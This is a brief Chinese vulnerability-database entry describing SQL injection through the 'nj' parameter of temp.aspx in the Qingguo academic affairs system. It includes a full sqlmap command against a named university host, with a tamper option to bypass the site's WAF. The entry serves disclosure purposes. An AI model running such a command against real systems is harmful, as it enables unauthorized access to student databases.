青果教务系统 /xsweb/pub/temp.aspx nj参数SQL注入漏洞
-
AV
AC
AU
C
I
A
发布:
2025-04-13
修订:
2025-04-13
存在漏洞的文件:/xsweb/pub/temp.aspx?type=ajax&fellowXh=wooyun 该系统有waf的防御,只需要使用--tamper参数即可绕过,继续注入 sqlmap.py -u "http://stu.gxufe.cn/xsweb/pub/temp.aspx?type=menu&nj=wooyun" --tamper "equaltolike.py" --dbms mssql
漏洞利用/PoC
暂无可用Exp或PoC
受影响的平台与产品
当前有0条受影响产品信息
